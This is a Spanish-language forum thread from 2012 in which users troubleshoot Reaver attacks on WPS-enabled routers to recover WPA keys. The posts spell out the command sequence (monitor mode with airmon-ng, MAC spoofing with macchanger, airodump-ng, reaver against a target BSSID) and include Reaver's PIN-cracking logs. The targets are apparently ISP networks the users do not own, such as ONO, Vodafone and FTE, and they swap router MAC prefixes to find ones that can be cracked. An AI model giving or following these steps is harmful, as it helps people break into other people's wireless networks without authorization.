REAVER: Vulnerabilidad de WPA por WPS habilitado

maik78 · 23 Julio 2012, 11:45 AM

Buenas a todos,
Gracias por darnos soporte...
A ver voy con mi problema, tengo broadcom y solo hago funcionar el wifislax 4.1 beta 3 por ahi por donde intento sacar la clave de onoxxxx, pero no sé si lo hago mal o no espero el suficiente tiempo.
Hago los siguientes pasos:

airmon-ng start wlan0

Abro el wireshark, busco la red que tenga WPS

Cambio la MAC
macchanger -m 00:11:22:33:44:55 mon0

airodump-ng mon0

reaver -i mon0 -b ESSID ELEGIDA -vv

Y se mete en un bucle de canales, lo más interesante que me sale es esto:

[!] WARNING: Receive timeout occurred

Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures
Sending EAPOL START request
Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
Nothing done, nothing to save.
0.00% complete @ 2012-07-22 10:03:19 (0 seconds/pin)
Trying pin 12345670

Y al final lo quite a las 20 horas de no tener resultado.
Es normal?? Tengo que esperar más??
Muchas gracias.

GOolden · 23 Julio 2012, 14:30 PM

Alguien ha sacado alguna fte-xxxx modelo sagem con wps activado

GOolden · 23 Julio 2012, 14:32 PM

maik78 quizas la ono esa tenga el wps activado pero no se vulnerable al ataque de reaver dime la mac y mas datos sobre esa red y tu has sacado alguna vodafone salud

maik78 · 23 Julio 2012, 14:59 PM

Buenas GOolden a ver yo en esto de las WPS estoy verde... Como he dicho antes es una ONOXXXX con MAC 30:46:9A... con seguridad WPA2...

Me extraña lo de no ser vulnerable, por lo que he visto las WPS son vulnerables al 95%

Saludos.

GOolden · 23 Julio 2012, 16:18 PM

Hola maik78 quizas ese router no es vulnerable a ese ataque es que hay router que aunque tengan el wps activo no son vulnerables al reaver tambien influye la distancia que este el router de ti hay mucha distancia

P4nd3m0n1um · 23 Julio 2012, 18:22 PM

broadcom no es compatible con reaver.

GOolden · 23 Julio 2012, 20:23 PM

P4nd3m0n1um tu has sacado alguna red con esta mac 64:16:f0

P4nd3m0n1um · 24 Julio 2012, 01:39 AM

@GOolden: no existen en mi pais..

GOolden · 24 Julio 2012, 10:13 AM

Sending EAPOL START request
Sending identity response
Sending M2 message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending M2D message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending WSC ACK
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Got packet type 21 (0x15), but haven't broken the first half of the pin yet!
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Got packet type 19 (0x13), but haven't broken the first half of the pin yet!
que significa esto todo va bien va cambiando de pin pero ha un cierto intentos de pines se para lo pongo otra vez y sigue avanzando es una red vodafone que estoy haciendo pruebas y quiero saber si conseguire la clave o no pero va cambiando de pin con esos mesages que o epuesto y se para ha cierto intentos

maik78 · 25 Julio 2012, 00:05 AM

Cita de: P4nd3m0n1um en 23 Julio 2012, 18:22 PM
broadcom no es compatible con reaver.

Perdonar la ignorancia pero sí no fuesen compatibles qué llegué el conteo a esto:

0.56% complete @ 2012-07-22 10:03:19 (265 seconds/pin)
Es posible??